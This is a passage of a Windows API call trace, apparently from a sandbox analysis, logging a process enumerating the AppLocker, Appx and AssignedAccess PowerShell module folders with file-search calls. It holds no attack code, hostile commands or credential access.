lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.515] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.515] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0224.515] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0224.515] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.515] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0224.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.516] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0224.516] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.516] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.516] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0224.517] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0224.517] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0224.517] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.517] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.517] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.517] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0224.518] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.518] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.518] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0224.518] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0224.518] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0224.518] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.518] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0224.519] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.519] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0224.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.519] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.519] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0224.519] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.520] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.520] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0224.520] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0224.520] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0224.520] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.520] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.520] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.521] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0224.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.521] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0224.521] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.521] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.522] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0224.522] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0224.522] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.522] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.522] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.522] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0224.522] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.523] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.523] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0224.523] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0224.523] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.523] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0224.523] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.524] GetFullPathNameW (in: 